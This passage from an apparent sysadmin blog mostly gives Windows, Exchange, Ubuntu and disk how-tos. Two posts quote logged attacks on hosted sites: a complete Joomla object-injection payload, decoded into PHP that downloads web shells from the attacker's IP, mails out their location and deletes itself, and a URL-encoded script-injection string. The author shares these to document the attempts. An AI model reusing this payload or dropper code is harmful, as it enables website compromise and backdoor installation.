UPGRADE, the ISO must match what's on your system now. Many of the issues people are having is that they are trying to upgrade their system with a WINDOWS 10 PRO SINGLE LANGUAGE when they have WINDOWS 7 ALL LANGUAGES installed on their machine. ### SECOND WAY TO GET WINDOWS 10 ISO So you have a bootable USB to install WINDOWS 10. You want to turn that into an ISO. How do you do it? You don't turn it into an ISO. You turn it into a IMG (more specifically an imgPTN file). I won't go into details but you can't turn an entire bootable USB into an ISO easily. There's too many variables. But you can turn a bootable USB partition into a bootable partition image, hence imgPTN. Here's how to turn it into an BOOTABLE IMG. • -download the software to create a PARTITION IMAGE here: • http://files.easy2boot.com/200001685-7c24a7e1e7/MPI_Tool_Pack_Plus_CloverLite_065.zip • -unzip it. • -open the ImDisk\imdiskinst.exe file and run it to install the driver. • -right-click CREATEDESKTOPSHORTCUTS.CMD and RUN-AS-ADMINISTRATOR. • -plug in your BOOTABLE USB drive. • -the computer will assign a drive letter (for example DRIVE G). • -drag the USB DRIVE LETTER onto the MAKEPARTIMAGE shortcut. • -it will create an image of the USB drive. • -wait. • -put the IMG in the appropriate folder (probably G:\_ISO\WINDOWS\WIN10\). • -click MAKE_THIS_DRIVE_CONTIGUOUS That's it!!!! You've done it. ## Creating Resource Rooms in Exchange 2013 Creating resource rooms in EXCHANGE 2013 can be complicated as the GUI doesn't work in a straight-forward manner. Here's how I did it: • New-Mailbox -Database "Mailbox-FOO" -Name conference.downstairs -DisplayName "Conference Downstairs" -Room • Set-MailboxFolderPermission conference.downstairs:\Calendar -User Default -AccessRights Reviewer • Set-CalendarProcessing conference.downstairs -AutomateProcessing AutoAccept This will allow users to set an appointment with the ROOM as the LOCATION but will only allow the ORGANIZER to adjust the appointment (rather than letting anyone change the appointment). ## Hacking Attempt 16-06 Here's another hacking attempt on another hosted web site. This attempt is from: 74.208.47.52 which was resolving to catchmeapp.com NOTE: Often the hacking web site is not the perpetrator and is hacked itself. This makes it hard to discover the real hacker. ========================== GET / HTTP/1.1" 301 236 "-" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimp lepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_u rl\";s:3810:\"eval(base64_decode('JGNoZWNrID0gJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXSAuICIvbGlicmFyaWVzL2pvb21sYS9sb2wucGhwIiA7DQokZnA9Zm9wZW4oIiRjaGVjayIsIncrIik7 DQpmd3JpdGUoJGZwLGJhc2U2NF9kZWNvZGUoJ1BEOXdhSEFOQ21aMWJtTjBhVzl1SUdoMGRIQmZaMlYwS0NSMWNtd3BldzBLQ1NScGJTQTlJR04xY214ZmFXNXBkQ2drZFhKc0tUc05DZ2xqZFhKc1gzTmxkRz l3ZENna2FXMHNJRU5WVWt4UFVGUmZVa1ZVVlZKT1ZGSkJUbE5HUlZJc0lERXBPdzBLQ1dOMWNteGZjMlYwYjNCMEtDUnBiU3dnUTFWU1RFOVFWRjlEVDA1T1JVTlVWRWxOUlU5VlZDd2dNVEFwT3cwS0NXTjFj bXhmYzJWMGIzQjBLQ1JwYlN3Z1ExVlNURTlRVkY5R1QweE1UMWRNVDBOQlZFbFBUaXdnTVNrN0RRb0pZM1Z5YkY5elpYUnZjSFFvSkdsdExDQkRWVkpNVDFCVVgwaEZRVVJGVWl3Z01DazdEUW9KY21WMGRYSn VJR04xY214ZlpYaGxZeWdrYVcwcE93MEtDV04xY214ZlkyeHZjMlVvSkdsdEtUc05DbjBOQ2lSamFHVmpheUE5SUNSZlUwVlNWa1ZTV3lkRVQwTlZUVVZPVkY5U1QwOVVKMTBnTGlBaUwyeHBZbkpoY21sbGN5 OXFiMjl0YkdFdlkzTnpMbkJvY0NJZ093MEtKSFJsZUhRZ1BTQm9kSFJ3WDJkbGRDZ25hSFIwY0Rvdkx6YzBMakl3T0M0ME55NDFNaTluWlhRdlkzTnpMblI0ZENjcE93MEtKRzl3Wlc0Z1BTQm1iM0JsYmlna1 kyaGxZMnNzSUNkM0p5azdEUXBtZDNKcGRHVW9KRzl3Wlc0c0lDUjBaWGgwS1RzTkNtWmpiRzl6WlNna2IzQmxiaWs3RFFwcFppaG1hV3hsWDJWNGFYTjBjeWdrWTJobFkyc3BLWHNOQ2lBZ0lDQmxZMmh2SUNS amFHVmpheTRpUEM5aWNqNGlPdzBLZldWc2MyVWdEUW9nSUdWamFHOGdJbTV2ZENCbGVHbDBjeUk3RFFwbFkyaHZJQ0prYjI1bElDNWNiaUFpSURzTkNpUmphR1ZqYXpJZ1BTQWtYMU5GVWxaRlVsc25SRTlEVl UxRlRsUmZVazlQVkNkZElDNGdJaTlzYVdKeVlYSnBaWE12YW05dmJXeGhMMnB0WVdsc0xuQm9jQ0lnT3cwS0pIUmxlSFF5SUQwZ2FIUjBjRjluWlhRb0oyaDBkSEE2THk4M05DNHlNRGd1TkRjdU5USXZaMlYw TDIwdWRIaDBKeWs3RFFva2IzQmxiaklnUFNCbWIzQmxiaWdrWTJobFkyc3lMQ0FuZHljcE93MEtabmR5YVhSbEtDUnZjR1Z1TWl3Z0pIUmxlSFF5S1RzTkNtWmpiRzl6WlNna2IzQmxiaklwT3cwS2FXWW9abW xzWlY5bGVHbHpkSE1vSkdOb1pXTnJNaWtwZXcwS0lDQWdJR1ZqYUc4Z0pHTm9aV05yTWk0aVBDOWljajRpT3cwS2ZXVnNjMlVnRFFvZ0lHVmphRzhnSW01dmRDQmxlR2wwY3pJaU93MEtaV05vYnlBaVpHOXVa VElnTGx4dUlDSWdPdzBLRFFva1kyaGxZMnN6UFNSZlUwVlNWa1ZTV3lkRVQwTlZUVVZPVkY5U1QwOVVKMTBnTGlBaUwzY3VhSFJ0SWlBN0RRb2tkR1Y0ZERNZ1BTQm9kSFJ3WDJkbGRDZ25hSFIwY0Rvdkx6Yz BMakl3T0M0ME55NDFNaTluWlhRdmR5NTBlSFFuS1RzTkNpUnZjRE05Wm05d1pXNG9KR05vWldOck15d2dKM2NuS1RzTkNtWjNjbWwwWlNna2IzQXpMQ1IwWlhoME15azdEUXBtWTJ4dmMyVW9KRzl3TXlrN0RR b05DaVJqYUdWamF6UTlKRjlUUlZKV1JWSmJKMFJQUTFWTlJVNVVYMUpQVDFRblhTQXVJQ0l2YkdsaWNtRnlhV1Z6TDJwdmIyMXNZUzlqYUdWamF5NXdhSEFpSURzTkNpUjBaWGgwTkNBOUlHaDBkSEJmWjJWME tDZG9kSFJ3T2k4dk56UXVNakE0TGpRM0xqVXlMMmRsZEM5akxuUjRkQ2NwT3cwS0pHOXdORDFtYjNCbGJpZ2tZMmhsWTJzMExDQW5keWNwT3cwS1puZHlhWFJsS0NSdmNEUXNKSFJsZUhRMEtUc05DbVpqYkc5 elpTZ2tiM0EwS1RzTkNnMEtKR05vWldOck5UMGtYMU5GVWxaRlVsc25SRTlEVlUxRlRsUmZVazlQVkNkZElDNGdJaTlzYVdKeVlYSnBaWE12YW05dmJXeGhMMnB0WVdsc2N5NXdhSEFpSURzTkNpUjBaWGgwTl NBOUlHaDBkSEJmWjJWMEtDZG9kSFJ3T2k4dk56UXVNakE0TGpRM0xqVXlMMmRsZEM5dGJTNTBlSFFuS1RzTkNpUnZjRFU5Wm05d1pXNG9KR05vWldOck5Td2dKM2NuS1RzTkNtWjNjbWwwWlNna2IzQTFMQ1Iw WlhoME5TazdEUXBtWTJ4dmMyVW9KRzl3TlNrN0RRb05DaVJqYUdWamF6WTlKRjlUUlZKV1JWSmJKMFJQUTFWTlJVNVVYMUpQVDFRblhTQXVJQ0l2YkdsaWNtRnlhV1Z6TDJwdmIyMXNZUzlxZFhObGNpNXdhSE FpSURzTkNpUjBaWGgwTmlBOUlHaDBkSEJmWjJWMEtDZG9kSFJ3T2k4dk56UXVNakE0TGpRM0xqVXlMMmRsZEM5MWMyVnlMblI0ZENjcE93MEtKRzl3TmoxbWIzQmxiaWdrWTJobFkyczJMQ0FuZHljcE93MEta bmR5YVhSbEtDUnZjRFlzSkhSbGVIUTJLVHNOQ21aamJHOXpaU2drYjNBMktUc05DZzBLSkhSdmVpQTlJQ0puWVdKaWVTNWpZWE5vUUhsaGJtUmxlQzVqYjIwc2IyeHZhbVZ6YUdGcllYSmhRR2R0WVdsc0xtTn ZiU0k3RFFva2MzVmlhbVZqZENBOUlDZEtiMjBnZW5wNklDY2dMaUFrWDFORlVsWkZVbHNuVTBWU1ZrVlNYMDVCVFVVblhUc05DaVJvWldGa1pYSWdQU0FuWm5KdmJUb2dTMlZyYTJGcElGTmxibk5sYmlBOGRt OXVVbVZwYm1obGNucExiR0YxYzBCVFlXbHJiM1Z1WVVocFlta3VZMjl0UGljZ0xpQWlYSEpjYmlJN0RRb2tiV1Z6YzJGblpTQTlJQ0pUYUdWc2JIb2dPaUJvZEhSd09pOHZJaUF1SUNSZlUwVlNWa1ZTV3lkVF JWSldSVkpmVGtGTlJTZGRJQzRnSWk5c2FXSnlZWEpwWlhNdmFtOXZiV3hoTDJwdFlXbHNMbkJvY0Q5MUlpQXVJQ0pjY2x4dUlpQXVJSEJvY0Y5MWJtRnRaU2dwSUM0Z0lseHlYRzRpT3cwS0pITmxiblJ0WVds c0lEMGdRRzFoYVd3b0pIUnZlaXdnSkhOMVltcGxZM1FzSUNSdFpYTnpZV2RsTENBa2FHVmhaR1Z5S1RzTkNnMEtRSFZ1YkdsdWF5aGZYMFpKVEVWZlh5azdEUW9OQ2cwS1B6ND0nKSk7DQpmY2xvc2UoJGZwKT s='));JFactory::getConfig();exit\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s :4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}\xf0\xfd\xfd\xfd" =============================================== This translates into: ===============================================$check = $_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/lol.php" ;$fp=fopen("$check","w+"); fwrite($fp,base64_decode('PD9waHANCmZ1bmN0aW9uIGh0dHBfZ2V0KCR1cmwpew0KCSRpbSA9IGN1cmxfaW5pdCgkdXJsKTsNCgljdXJsX3NldG9wdCgkaW0sIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOw0KCWN1cmxfc2V0b3B0KCRpbSwgQ1VSTE9QVF9DT05ORUNUVElNRU9VVCwgMTApOw0KCWN1cmxfc2V0b3B0KCRpbSwgQ1VSTE9QVF9GT0xMT1dMT0NBVElPTiwgMSk7DQoJY3VybF9zZXRvcHQoJGltLCBDVVJMT1BUX0hFQURFUiwgMCk7DQoJcmV0dXJuIGN1cmxfZXhlYygkaW0pOw0KCWN1cmxfY2xvc2UoJGltKTsNCn0NCiRjaGVjayA9ICRfU0VSVkVSWydET0NVTUVOVF9ST09UJ10gLiAiL2xpYnJhcmllcy9qb29tbGEvY3NzLnBocCIgOw0KJHRleHQgPSBodHRwX2dldCgnaHR0cDovLzc0LjIwOC40Ny41Mi9nZXQvY3NzLnR4dCcpOw0KJG9wZW4gPSBmb3BlbigkY2hlY2ssICd3Jyk7DQpmd3JpdGUoJG9wZW4sICR0ZXh0KTsNCmZjbG9zZSgkb3Blbik7DQppZihmaWxlX2V4aXN0cygkY2hlY2spKXsNCiAgICBlY2hvICRjaGVjay4iPC9icj4iOw0KfWVsc2UgDQogIGVjaG8gIm5vdCBleGl0cyI7DQplY2hvICJkb25lIC5cbiAiIDsNCiRjaGVjazIgPSAkX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddIC4gIi9saWJyYXJpZXMvam9vbWxhL2ptYWlsLnBocCIgOw0KJHRleHQyID0gaHR0cF9nZXQoJ2h0dHA6Ly83NC4yMDguNDcuNTIvZ2V0L20udHh0Jyk7DQokb3BlbjIgPSBmb3BlbigkY2hlY2syLCAndycpOw0KZndyaXRlKCRvcGVuMiwgJHRleHQyKTsNCmZjbG9zZSgkb3BlbjIpOw0KaWYoZmlsZV9leGlzdHMoJGNoZWNrMikpew0KICAgIGVjaG8gJGNoZWNrMi4iPC9icj4iOw0KfWVsc2UgDQogIGVjaG8gIm5vdCBleGl0czIiOw0KZWNobyAiZG9uZTIgLlxuICIgOw0KDQokY2hlY2szPSRfU0VSVkVSWydET0NVTUVOVF9ST09UJ10gLiAiL3cuaHRtIiA7DQokdGV4dDMgPSBodHRwX2dldCgnaHR0cDovLzc0LjIwOC40Ny41Mi9nZXQvdy50eHQnKTsNCiRvcDM9Zm9wZW4oJGNoZWNrMywgJ3cnKTsNCmZ3cml0ZSgkb3AzLCR0ZXh0Myk7DQpmY2xvc2UoJG9wMyk7DQoNCiRjaGVjazQ9JF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXSAuICIvbGlicmFyaWVzL2pvb21sYS9jaGVjay5waHAiIDsNCiR0ZXh0NCA9IGh0dHBfZ2V0KCdodHRwOi8vNzQuMjA4LjQ3LjUyL2dldC9jLnR4dCcpOw0KJG9wND1mb3BlbigkY2hlY2s0LCAndycpOw0KZndyaXRlKCRvcDQsJHRleHQ0KTsNCmZjbG9zZSgkb3A0KTsNCg0KJGNoZWNrNT0kX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddIC4gIi9saWJyYXJpZXMvam9vbWxhL2ptYWlscy5waHAiIDsNCiR0ZXh0NSA9IGh0dHBfZ2V0KCdodHRwOi8vNzQuMjA4LjQ3LjUyL2dldC9tbS50eHQnKTsNCiRvcDU9Zm9wZW4oJGNoZWNrNSwgJ3cnKTsNCmZ3cml0ZSgkb3A1LCR0ZXh0NSk7DQpmY2xvc2UoJG9wNSk7DQoNCiRjaGVjazY9JF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXSAuICIvbGlicmFyaWVzL2pvb21sYS9qdXNlci5waHAiIDsNCiR0ZXh0NiA9IGh0dHBfZ2V0KCdodHRwOi8vNzQuMjA4LjQ3LjUyL2dldC91c2VyLnR4dCcpOw0KJG9wNj1mb3BlbigkY2hlY2s2LCAndycpOw0KZndyaXRlKCRvcDYsJHRleHQ2KTsNCmZjbG9zZSgkb3A2KTsNCg0KJHRveiA9ICJnYWJieS5jYXNoQHlhbmRleC5jb20sb2xvamVzaGFrYXJhQGdtYWlsLmNvbSI7DQokc3ViamVjdCA9ICdKb20genp6ICcgLiAkX1NFUlZFUlsnU0VSVkVSX05BTUUnXTsNCiRoZWFkZXIgPSAnZnJvbTogS2Vra2FpIFNlbnNlbiA8dm9uUmVpbmhlcnpLbGF1c0BTYWlrb3VuYUhpYmkuY29tPicgLiAiXHJcbiI7DQokbWVzc2FnZSA9ICJTaGVsbHogOiBodHRwOi8vIiAuICRfU0VSVkVSWydTRVJWRVJfTkFNRSddIC4gIi9saWJyYXJpZXMvam9vbWxhL2ptYWlsLnBocD91IiAuICJcclxuIiAuIHBocF91bmFtZSgpIC4gIlxyXG4iOw0KJHNlbnRtYWlsID0gQG1haWwoJHRveiwgJHN1YmplY3QsICRtZXNzYWdlLCAkaGVhZGVyKTsNCg0KQHVubGluayhfX0ZJTEVfXyk7DQoNCg0KPz4='));
fclose($fp); ================================================ Which further is decoded to: ================================================ <?php function http_get($url){
$im = curl_init($url);
curl_setopt($im, CURLOPT_RETURNTRANSFER, 1); curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($im, CURLOPT_HEADER, 0);
return curl_exec($im); curl_close($im);
}
$check =$_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/css.php" ;
$text = http_get('http://74.208.47.52/get/css.txt');$open = fopen($check, 'w'); fwrite($open, $text); fclose($open);
if(file_exists($check)){ echo$check."</br>";
}else
echo "not exits";
echo "done .\n " ;
$check2 =$_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/jmail.php" ;
$text2 = http_get('http://74.208.47.52/get/m.txt');$open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2);
if(file_exists($check2)){ echo$check2."</br>";
}else
echo "not exits2";
echo "done2 .\n " ;

$check3=$_SERVER['DOCUMENT_ROOT'] . "/w.htm" ;
$text3 = http_get('http://74.208.47.52/get/w.txt');$op3=fopen($check3, 'w'); fwrite($op3,$text3); fclose($op3);

$check4=$_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/check.php" ;
$text4 = http_get('http://74.208.47.52/get/c.txt');$op4=fopen($check4, 'w'); fwrite($op4,$text4); fclose($op4);

$check5=$_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/jmails.php" ;
$text5 = http_get('http://74.208.47.52/get/mm.txt');$op5=fopen($check5, 'w'); fwrite($op5,$text5); fclose($op5);

$check6=$_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/juser.php" ;
$text6 = http_get('http://74.208.47.52/get/user.txt');$op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6);

$toz = " This e-mail address is being protected from spambots. You need JavaScript enabled to view it , This e-mail address is being protected from spambots. You need JavaScript enabled to view it ";$subject = 'Jom zzz ' . $_SERVER['SERVER_NAME'];$header = 'from: Kekkai Sensen < This e-mail address is being protected from spambots. You need JavaScript enabled to view it >'; document.write( '' ); document.write( addy_text19833 ); document.write( '<\/a>' ); //--> This e-mail address is being protected from spambots. You need JavaScript enabled to view it ;' . "\r\n";
$message = "Shellz : http://" .$_SERVER['SERVER_NAME'] . "/libraries/joomla/jmail.php?u" . "\r\n" . php_uname() . "\r\n";
$sentmail = @mail($toz, $subject,$message, $header); @unlink(__FILE__); ?> =============================================== Nice try... but not this time. ## Hacking Attempt 16-05 Here's a recent hacking attempt into a hosted web site. The hacking attempt is from webmeup-crawler.com ============================= /%3Cscript%20type=%27text/javascript%27%3E%20%3C%21--%20var%20prefix%20=%20%27ma%27%20+%20%27il%27%20+%20%27to%27;%20var%20path%20=%20%27hr%27%20+%20%27ef%27%20+%20%27=%27;%20var%20addy64466%20=%20%27PetersHyland%27%20+%20%27@%27;%20addy64466%20=%20addy64466%20+%20%27ipre%27%20+%20%27.%27%20+%20%27com%27;%20document.write%28%27%3Ca%20%27%20+%20path%20+%20%27%5C%27%27%20+%20prefix%20+%20%27:%27%20+%20addy64466%20+%20%27%5C%27%3E%27%29;%20document.write%28addy64466%29;%20document.write%28%27%3C%5C/a%3E%27%29;%20/--%3E%5Cn%20%3C/script%3E%3Cscript%20type=%27text/javascript%27%3E%20%3C%21--%20document.write%28%27%3Cspan%20style=%5C%27display:%20none;%5C%27%3E%27%29;%20/--%3E%20%3C/script%3EThis%20email%20address%20is%20being%20protected%20from%20spambots.%20You%20need%20JavaScript%20enabled%20to%20view%20it.%20%3Cscript%20type=%27text/javascript%27%3E%20%3C%21--%20document.write%28%27%3C/%27%29;%20document.write%28%27span%3E%27%29;%20/--%3E%20%3C/script%3E ============================== This translates into: ============================== <script type='text/javascript'> <!-- var prefix = 'ma' 'il' 'to'; var path = 'hr' 'ef' '='; var addy64466 = 'PetersHyland' '@'; addy64466 = addy64466 'ipre' '.' 'com'; document.write('<a ' path '\'' prefix ':' addy64466 '\'>'); document.write(addy64466); document.write('<\/a>'); /-->\n </script><script type='text/javascript'> <!-- document.write('<span style=\'display: none;\'>'); /--> </script>This email address is being protected from spambots. You need JavaScript enabled to view it. <script type='text/javascript'> <!-- document.write('</'); document.write('span>'); /--> </script> ============================== This was repeated in a brute force attack, changing the password for every attemtp. Nice one... but not this time. ## Clean Install Windows 10 Clean installing Windows 10 can be a pain. There's too many gotchas that it can be frustrating. Here's how I did it: • -download the MEDIA CREATION TOOL for WINDOWS 10. • -after your have created the USB, check to make sure you have the right BUILD NUMBER (see other article post). • -SKIP PRODUCT KEY DURING INSTALL (OR "Do This Later or I Don't Have a Key"). Save the activation after install with your Windows 7, 8 or 8.1 Product Key, even if embedded in BIOS. (NOTE: this is in contrast to the WINDOWS 8 that requires to NOT select "I don't have a product key" as activation will not be successful. ) ## Find Windows 10 ISO Version or Build Number Finding the Windows 10 ISO version or Build Number is important because builds starting in November 2015 and newer allow you to clean install Windows 10 if you have Windows 7 or Windows 8. • -mount the ISO to expose the files. This can be done through Windows 10, if you have another computer available or through VirtualCD. • -find where the "install.wim" (or install.esd) is. For example; F:\sources\install.wim • -open CMD • -type: dism /Get-WimInfo /WimFile:F:\sources\install.wim /index:1 • -or if Windows 10 install.esd file, type: dism /Get-WimInfo /WimFile:F:\sources\install.esd /index:1 This will show the details of the INSTALL.WIM file. NOTE: -in some cases, Windows-7 will not be able to read a Windows-10 install.esd file :-( ## Re-enable Mailbox in Exchange 2013 If you disable a MAILBOX in EXCHANGE, the account is available for 30 days by default. However if you disable a MAILBOX in EXCHANGE and you disable an AD account, the MAILBOX will not show as a disconnected MAILBOX. Here's how to get it back on demand. First, check to see the RETENTION settings of the MAILBOXDATABASE:$Get-MailboxDatabase "Mailbox-Database-Name-Here" | fl | grep MailboxRetention

Now, let's make sure that the MAILBOX is still in the MAILBOXDATABASE:

$Get-MailboxStatistics -Database "Mailbox-Database-Name-Here" You will see all the accounts. Once you see the account that you want back, you will need the full DISPLAY NAME of the account needed.$Get-MailboxStatistics -Database "Mailbox-Database-Name-Here" | fl | grep -i any-part-of-account-name-here

Lastly, let's reconnect the MAILBOX and connect it to an ACCOUNT:

$Get-MailboxDatabase -Identity "Mailbox-Database-Name-Here" | Get-MailboxStatistics | Where {$_.Displayname -eq "full-display-name-here)" } | Connect-Mailbox -User "username-here"

## Windows 8/8.1/10 Product Keys

SITUATION

You have a new computer and you test out Linux destroying everything on the hard drive. You go to reinstall Windows and you realize that you do not have the PRODUCT KEY. There is no label on the side/back/inside of the pc. You have an OEM Windows 8.1 disk. The pc does not have a DVD drive.

RESOLUTION

Find a pc that has a DVD drive.

1-create an ISO with 7ZIP.

• -select the DVD DRIVE.
• -click VIEW (at the top).
• -click OPEN ROOT FOLDER.
• -click VIEW (at the top).
• -click UP ONE LEVEL.
• -in the main window you will see: \\. (backslash, backslash, dot).
• -double-click \\.
• -select the DVD drive.
• -click FILE > COPY-TO (at the top)
• -select the folder where you want the ISO to go.

2-copy that ISO to your EASY2BOOT USB.

• -easy squeezy.

NOTE: if you do not have one, get one. It's super easy. Run tool. Have USB.

3-install WINDOWS.

• -the install should use the PRODUCT KEY from the UEFI (or in laymans terms BIOS).
• -if you are being prompted for a product key, it means that you have the wrong installation media and that's when the Windows 8.1/10 installer can't detect Windows 8/8.1 product key from UEFI firmware (BIOS).
• -it will prompt which version to install, WINDOWS 8.1, WINDOWS 8.1 CORE, WINDOWS 8.1 SINGLE LANGUAGE (same as PRO), WINDOWS 8.1 PRO
• -do NOT select "I don't have a product key". Activation will not be successful.

4-find WINDOWS PRODUCT KEY in the UEFI.

• -open the tool.
• -click ACPI (at the top).
• -click MSDM tab (towards the top)
• -look at the last line, it is the embedded PRODUCT KEY ;-)

There are other ways to do this such as:

• -open COMMAND PROMPT.
• -type: WMIC Path SoftwareLicensingService Get OA3xOriginalProductKey

As well as other ways.

NOTES:

## Wrong Time on Ubuntu - NTP

SCENARIO

Fresh install of Ubuntu. Wrong time. Day later, still wrong time.

HOW TO FIX THE WRONG TIME ON UBUNTU

• -edit /etc/ntp.conf
• -comment out the "pool" servers.
• -comment out the fallback "pool" server.
• -type: server 192.168.1.1 (or local server/router/switch that can provide NTP services)
• -save
• -stop service: /etc/init.d/ntp stop
• -start service: /etc/init.d/ntp start

This may happen for various reasons. For me, the high-end firewall was blocking outside NTP servers from talking on port 123.

NOTES: do not use/install ntpdate package, it is depreciated.

## Digital Watchdog Spectrum Client on Ubuntu 16.0.4 LTS

Getting Digital Watchdog Spectrum Client on Ubuntu 16.0.4 LTS can be not-so-straight-forward especially if you are not from the Linux world.

TO INSTALL:

• open TERMINAL
• type: sudo dkpg -i digitalwatchdog-client-2.4.1.10278-x64-release.deb
• (NOTE: do not just double-click on the file. Do not install with UBUNTU SOFTWARE MANAGER).
• go through the setup process.

On UBUNTU 14.02, you are finished. On UBUNTU 16.0.4, you need the following:

• type: sudo apt-get install libgstreamer-plugins-base0.10-dev

That's it! You should now be able to use the Digital Watchdog Spectrum client.

## Testing HD with Smartctl & Finding the Filesystem

Hmmm. Something is wrong with SDA. Let's test it:

1.smartctl -t short /dev/sda

And look at the results:

1.smartctl -a /dev/sda

The last 5 result log shows:
Error: UNC 8 sectors at LBA = 0x00384622 = 3687970

SMART Self-test log structure revision number 1
Num Test_Description Status Remaining LifeTime(hours) LBA_of_first_error
# 1 Short offline Completed: read failure 10% 44084 976766499

So we have to find the filesystem. Usually it would be:

1.# fdisk -lu /dev/sda

I get:

1.Disk /dev/sda: 500.1 GB, 500107862016 bytes
2.255 heads, 63 sectors/track, 60801 cylinders, total 976773168 sectors
3.Units = sectors of 1 * 512 = 512 bytes
4.Device Boot Start End Blocks Id System
5./dev/sda1 * 1 208769 104384+ fd Linux raid autodetect
6.Partition 1 does not end on cylinder boundary.
7./dev/sda2 208770 976768063 488279647 fd Linux raid autodetect

Using:
((976766499- 208770) * 512) / 4096

We get:
122069716 LBA block.

But wait, the filesystem isn't on sda, it's on /dev/main/root. Here's how:

1.# cat /etc/fstab
1./dev/main/root / ext3 usrquota,grpquota 1 1
2./dev/md1 /boot ext3 defaults 1 2
3./dev/main/swap swap swap defaults 0 0

So we know files system is mounted at /dev/main/root and it is ext3 type.

We can find the BLOCK SIZE by:

1.# tune2fs -l /dev/main/root | grep Block

I get:

1.Block count:              121561088
2.Block size:               4096
3.Blocks per group:         32768

We're still at 122069716 LBA block.
Or specifically 122069716.125 or the second of 8 sectors in this block.

We can test the block by:

1.# debugfs
2.debugfs 1.39 (29-May-2006)
3.debugfs:  open /dev/main/root
4.debugfs:  testb 122069716
5.Illegal block number passed to ext2fs_test_block_bitmap #122069716 for block bitmap for /dev/main/root
6.Block 122069716 not in use
7.debugfs:  quit

In short, it looks like this:

==================================================================
sda1  sdb1
|
md1

sdb1 sdb2
|
md2
|
pv (md2)
|
vg (main)
/            \
lv (main/root)        lv (main/swap)

## Transfer Hard Drive to New Hardware

Transfer hard drive to new hardware. It can be done.

• -take note of current setup bios for the ATA, AHCI, RAID setup.
• -run c:\windows\system32\sysprep\sysprep.exe
• -click GENERALIZE
• -wait an hour and let it shutdown.
• -tranfer to new hardware.
• -boot pc
• -change bios to match old setup.
• -wait for it to boot

All of your stuff should be intact.

If for some reason that doesn't work, you can always load the drivers in the Windows in an offline manner.

• -find your motherboard model number.
• -extract them to the C drive (for example: c:\drivers\chipset)
• -boot into REPAIR MODE or start with WINDOWS OS INSTALL media (usb, CD, PXE, etc).
• -click REPAIR YOUR COMPUTER (bottom-left).
• -click COMMAND PROMPT.
• -find what letter your WINDOWS-DIRECTORY is.
• -type: dism /image:c:\ /add-driver /Driver:e:\install\chipset\ /recurse
• -hit ENTER
• -type EXIT
• -reboot

## DNS Servers

I love DNS servers. I really do. You ask a question, they give an answer. Here are some of the more popular ones.

4.2.2.1
4.2.2.2
4.2.2.3
4.2.2.4
4.2.2.5

8.8.8.8
8.8.4.4

137.65.1.1
137.65.1.2
137.65.1.3

75.75.75.75
75.75.76.76

### OPENDNS SERVERS

208.67.222.222
208.67.220.220

You can use OPENDNS as a web content filtering tool to automatically block inappropriate content and keep children safe.

To ask a question you can use DIG (*nix) or NSLOOKUP (Windows). I prefer DIG and install it on Windows rather easily via GNUWIN.

• -open shell of some kind (putty, command, power, etc)
• -type: dig daknetworks.com
• -type: nslookup daknetworks.com

To ask a question of a specific server:

• -type: dig daknetworks.com @4.2.2.2
• -type: nslookup daknetworks.com 4.2.2.2

To ask a specific type of record:

• -type: dig -t mx daknetworks.com
• -type: nslookup set type=mx daknetworks.com

To ask for an authoritative record:

• -type: dig -t ns daknetworks.com
• -type: nslookup -type=soa daknetworks.com

To ask for all the info:

• -type: nslookup -debug daknetworks.com 1.2.3.4

## Clone MacBook Pro Hard Drive With Boot Camp

I have a 128GB SSD HD and I want to upgrade to a newly acquired 512GB SSD HD. How do I upgrade my ssd hard drive to a larger ssd hard drive on my MacBook Pro?

ps- I have Boot Camp with a Windows partition.
pss- many posts claim this can't be done or post a really, really long and complicated instruction set. Don't believe them. ;-)

• -clone the drive (clonezilla).
• -resize the Windows Boot Camp partition (gparted).
• -sync the partition tables (gparted).
• -resize the OSX partition (diskutil).
• -fix the Windows bootloader (Windows).

NEEDED
-usb with ubcd with parted magic (UBCD is universal boot cd).
-host system.
-Windows 7/8 cd/usb (or a Windows repair disk).

CLONE
-plug both ssd's into the host system.
-boot via usb.
-start parted-magic.
-start clonezilla
-clone disk to disk
-wait till finished
(this could take awhile)

MOVE/RESIZE WINDOWS PARTITION
-you should still be in parted-magic
-start gparted
-resize windows partition as needed (grab the handles)
-move windows partition to the end
-move the osx recovery boot loader next to the windows partition
-apply changes
-wait
-after it's finished, if needed, you can fix the filesystem for both OSX and WINDOWS.

SYNC FOR BOOT CAMP
-you should still be in parted-magic
-open terminal
-type: sudo gptsync /dev/sda (or other device such as sdb sdc sdd. gparted will show you).
-confirm Y
-shutdown

RESIZE OSX PARTITION
-boot into os x with the new, larger hd.
-open Disk Utility.
-click the disk on the left hand side.
-click the PARITION button (at the top).
-select the volume you want to grow.
-look at the info-window (at the bottom).
-note the Disk Identifier (mine was disk0s2).
-open Terminal.
-type the following command: diskutil resizeVolume /dev/disk0s2 limits
-it will show the current size, minimum size and maximum size.
-note the maximum size (mine was 254.2GB. Do not get the part in parentheses.)
-type the following command: sudo diskutil resizeVolume /dev/disk0s2 254.2GB
(NOTE: the number above requires a GB but no space.)
-wait.
-shutdown

This also works if you get messages like "No boot device found" etc.

This happens when the items get fouled up. How do you know if items are fouled up?
Boot MacBook Pro to Windows either:
